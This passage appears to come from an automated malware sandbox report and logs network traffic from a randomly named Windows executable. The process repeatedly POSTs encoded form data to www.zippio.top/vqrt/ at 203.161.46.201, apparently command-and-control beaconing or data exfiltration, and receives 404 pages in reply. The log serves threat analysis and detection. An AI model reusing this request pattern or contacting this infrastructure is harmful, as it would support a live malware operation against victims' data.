4e 58 38 6c 36 37 30 6e 59 63 6a 71 59 64 74 73 30 56 61 56 70 50 48 75 4c 44 42 50 65 76 63 68 35 62 70 53 62 78 79 41 59 43 46 34 72 68 57 39 36 61 56 2f 6c 6b 35 4f 4c 31 39 2b 6f 79 73 4d 72 54 41 43 42 64 44 41 49 59 76 49 36 37 38 75 4f 36 4b 46 33 56 72 6b 69 4c 38 35 70 30 51 53 61 36 37 7a 68 6f 67 41 6c 63 64 46 56 65 71 58 51 36 4d 39 36 59 36 33 69 51 59 33 73 45 38 47 74 67 3d 3d Data Ascii: wLTtn0=O9qgoKT+7RASN+Qyxg8+vOpYolocHj1OmPnrnj+JYpqNmPAZJ1RNfu9W8R4DS7h5m306mZsTMiSjGF3nNX8l670nYcjqYdts0VaVpPHuLDBPevch5bpSbxyAYCF4rhW96aV/lk5OL19+oysMrTACBdDAIYvI678uO6KF3VrkiL85p0QSa67zhogAlcdFVeqXQ6M96Y63iQY3sE8Gtg==
Aug 6, 2024 07:58:47.559601068 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Aug 2024 05:58:47 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
Aug 6, 2024 07:58:47.559629917 CEST	1236	IN	Data Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
Aug 6, 2024 07:58:47.559637070 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
Aug 6, 2024 07:58:47.559643984 CEST	1236	IN	Data Raw: 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7
Aug 6, 2024 07:58:47.559653044 CEST	896	IN	Data Raw: 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 30 2e 35 22 20 63 79 3d 22 38 30 37 Data Ascii: 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3
Aug 6, 2024 07:58:47.559672117 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
Aug 6, 2024 07:58:47.559720039 CEST	1236	IN	Data Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
Aug 6, 2024 07:58:47.559726000 CEST	448	IN	Data Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34 Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
Aug 6, 2024 07:58:47.559859991 CEST	1236	IN	Data Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
Aug 6, 2024 07:58:47.559915066 CEST	1236	IN	Data Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25
Aug 6, 2024 07:58:47.564759016 CEST	1236	IN	Data Raw: 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 30 39 22 20 63 79 3d 22 37 36 35 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 Data Ascii: fill: #ffe029"/> <circle cx="509" cy="765.9" r="3.7" transform="translate(-293.1 316.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="512" cy="748.1" r="3.7" transform="translate(-284.7 315.5) rotate(-27.1)" style="fill:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49740	203.161.46.201	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:49.533518076 CEST	809	OUT	POST /vqrt/ HTTP/1.1 Host: www.zippio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 239 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.zippio.top Referer: http://www.zippio.top/vqrt/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 4f 39 71 67 6f 4b 54 2b 37 52 41 53 4d 65 67 79 7a 48 51 2b 70 75 70 66 30 56 6f 63 4d 44 31 4b 6d 50 6a 72 6e 69 4b 5a 59 66 43 4e 6e 71 38 5a 62 6e 70 4e 59 75 39 57 30 78 34 4b 57 37 67 33 6d 33 34 59 6d 59 51 54 4d 6a 32 6a 47 45 48 6e 4e 6b 45 69 31 4c 30 68 54 38 6a 6b 56 39 74 73 30 56 61 56 70 4f 6a 45 4c 44 5a 50 65 65 73 68 34 36 70 52 59 78 79 44 52 69 46 34 76 68 57 6d 36 61 56 5a 6c 68 5a 67 4c 33 46 2b 6f 7a 63 4d 6c 6d 30 44 62 4e 44 61 47 34 75 5a 2b 70 74 67 4b 37 6d 66 39 55 4b 35 6c 35 31 53 68 69 4e 77 41 59 33 66 2f 35 59 37 68 65 35 7a 43 34 33 69 53 37 49 6c 33 36 4f 57 39 6e 39 64 68 57 64 43 37 66 70 73 33 38 76 4b 4a 39 53 46 75 4a 71 4b 70 48 45 2f 4e 43 6f 3d Data Ascii: wLTtn0=O9qgoKT+7RASMegyzHQ+pupf0VocMD1KmPjrniKZYfCNnq8ZbnpNYu9W0x4KW7g3m34YmYQTMj2jGEHnNkEi1L0hT8jkV9ts0VaVpOjELDZPeesh46pRYxyDRiF4vhWm6aVZlhZgL3F+ozcMlm0DbNDaG4uZ+ptgK7mf9UK5l51ShiNwAY3f/5Y7he5zC43iS7Il36OW9n9dhWdC7fps38vKJ9SFuJqKpHE/NCo=
Aug 6, 2024 07:58:50.116708040 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Aug 2024 05:58:50 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
Aug 6, 2024 07:58:50.116722107 CEST	224	IN	Data Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.
Aug 6, 2024 07:58:50.116733074 CEST	1236	IN	Data Raw: 36 20 32 39 39 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 36 35 2e 32 22 20 63 79 3d 22 38 35 Data Ascii: 6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="465.2" cy="859" r="3.7" transform="translate(-340.4 306.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="483" cy="849.2" r="3.7" transform="translate(-333.9 313
Aug 6, 2024 07:58:50.116822958 CEST	1236	IN	Data Raw: 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 39 2e 38 22 20 63 79 3d 22 37 39 31 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 Data Ascii: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="473.1" cy="798.2" r="3.7" transform="translate(-311.8 303.4) rotate(-27.1)" style="fill:
Aug 6, 2024 07:58:50.116843939 CEST	1236	IN	Data Raw: 22 20 63 79 3d 22 38 31 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 33 2e 34 20 33 32 36 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c Data Ascii: " cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3 334.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="536.8"
Aug 6, 2024 07:58:50.116849899 CEST	672	IN	Data Raw: 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 Data Ascii: ="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590" cy="782.3" r="3.7" transform="t
Aug 6, 2024 07:58:50.116883039 CEST	1236	IN	Data Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 33 30 2e 36 22 20 63 79 3d 22 37 35 38 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 34 20 33 37 30 2e 38 29 20 72 6f 74 61 74 65 Data Ascii: <circle cx="630.6" cy="758.5" r="3.7" transform="translate(-276.4 370.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="647" cy="766.1" r="3.7" transform="translate(-278 379) rotate(-27.1)" style="fill: #ffe029"/> <cir
Aug 6, 2024 07:58:50.116903067 CEST	1236	IN	Data Raw: 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 32 2e 37 20 33 35 34 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 Data Ascii: 6" transform="translate(-252.7 354.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="606.7" cy="718.2" r="3.7" transform="translate(-260.6 355.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="615.7" cy="747.7" r="3.7
Aug 6, 2024 07:58:50.116915941 CEST	448	IN	Data Raw: 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 31 2e 39 22 20 63 79 3d 22 37 31 34 Data Ascii: 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="587.4" cy="724.6" r="3.7" transform="translate(-265.7
Aug 6, 2024 07:58:50.116931915 CEST	1236	IN	Data Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
Aug 6, 2024 07:58:50.121917009 CEST	1236	IN	Data Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49741	203.161.46.201	80	6440	C:\Program Files (x86)\RGETBdyDZIpEZYdbVZOuCDMQxXNsRhHHOtJterkYovBCNXmethdSQujttpFK\hoCcQGubWgo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 6, 2024 07:58:52.079626083 CEST	1822	OUT	POST /vqrt/ HTTP/1.1 Host: www.zippio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 1251 Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Origin: http://www.zippio.top Referer: http://www.zippio.top/vqrt/ User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 Data Raw: 77 4c 54 74 6e 30 3d 4f 39 71 67 6f 4b 54 2b 37 52 41 53 4d 65 67 79 7a 48 51 2b 70 75 70 66 30 56 6f 63 4d 44 31 4b 6d 50 6a 72 6e 69 4b 5a 59 66 4b 4e 6d 63 49 5a 4a 51 39 4e 5a 75 39 57 2b 52 34 48 57 37 68 72 6d 33 67 63 6d 59 63 74 4d 68 2b 6a 41 6d 66 6e 61 46 45 69 69 37 30 68 63 63 6a 6c 59 64 74 44 30 56 4b 5a 70 4f 7a 45 4c 44 5a 50 65 64 30 68 2f 72 70 52 55 52 79 41 59 43 46 4f 72 68 58 4a 36 61 64 6e 6c 68 64 65 4b 47 6c 2b 6f 54 4d 4d 6f 30 73 44 44 64 44 45 57 6f 75 42 2b 70 68 72 4b 2f 2b 31 39 55 76 65 6c 35 39 53 77 57 4d 50 54 4a 33 43 69 76 63 53 70 50 56 30 4a 62 54 50 59 64 55 39 71 35 57 6e 2b 58 31 4a 73 33 35 77 32 66 41 64 75 50 2f 34 46 76 71 39 67 70 43 61 36 45 56 37 51 48 74 43 71 5a 69 34 56 78 6f 41 6b 63 69 43 71 64 32 30 6b 79 79 76 70 35 64 73 65 55 45 36 47 39 51 6e 73 57 32 31 75 6c 4f 70 55 78 44 33 7a 6b 36 39 78 45 51 65 70 6e 35 76 59 50 59 71 61 61 6e 6a 2b 38 38 52 36 35 59 52 63 69 6f 35 72 54 5a 42 67 43 4f 77 50 4c 6c 69 4f 35 34 69 36 54 64 2f 2b 46 33 [TRUNCATED] Data Ascii: wLTtn0=O9qgoKT+7RASMegyzHQ+pupf0VocMD1KmPjrniKZYfKNmcIZJQ9NZu9W+R4HW7hrm3gcmYctMh+jAmfnaFEii70hccjlYdtD0VKZpOzELDZPed0h/rpRURyAYCFOrhXJ6adnlhdeKGl+oTMMo0sDDdDEWouB+phrK/+19Uvel59SwWMPTJ3CivcSpPV0JbTPYdU9q5Wn+X1Js35w2fAduP/4Fvq9gpCa6EV7QHtCqZi4VxoAkciCqd20kyyvp5dseUE6G9QnsW21ulOpUxD3zk69xEQepn5vYPYqaanj+88R65YRcio5rTZBgCOwPLliO54i6Td/+F3+9fTxzZ85RstSoWbkAXa+MSfxgs2vO4oOXE/GtBcE4dQH8yIWD/FJjtZ3rS9JCeiORTHwOnfvzbG1bbY3W632WM63vQPWuGcQX76LUXg2v8tcMUgqC1C+NM/7LQov6FfXhWT+hH8fxfY/eBf3uNzYLYTgmYfhPsb8wxRvpT9od32ij2aH2u/wkFJeczgxkFlsmlilIjWTDc2YT/g6qJlZAxiqUsX2fCkGlcP8bR6Kz9eRE8iHScC5oMmBWY0cZ6b6rXPaWvRBlRWJQbssHtMdf7nO671K6jrdiGFcv6o2FafNGXGfl3bPzcMMqDIUKy53jK/u73zOra2X+yGD0OKZtXxSZ9a8sBjcA8Yj4oDSM5ye4VJOoKMFEeTTI8o+THtO4aTh7AW57wls3uOLywgSLqYH0w4LC2Hk2Jg0hL+aw4au0K5Dvt1Teo4oi0dn8L8+RDmXIgy4j8kUwNzlkhg+21g1Dzd4B7DZCnkqnLq7LGdsx4B45TX0VBovGRhgyPIZjKrFQWJ4FqhTjrgUJoy7Ydgbd0M/f+6mEO89OOtf6wO8GdAqdBuUjgyhmLZexyUy7cRtv2RnpWVySw9Z6OQe3tJs96njAGgq02FauLoDDhFdOmoDFBM+V7zm8o5tzqAemnja57/p3vBnQTaZKJi5DGDhEif44iiv0 [TRUNCATED]
Aug 6, 2024 07:58:52.642779112 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 06 Aug 2024 05:58:52 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" 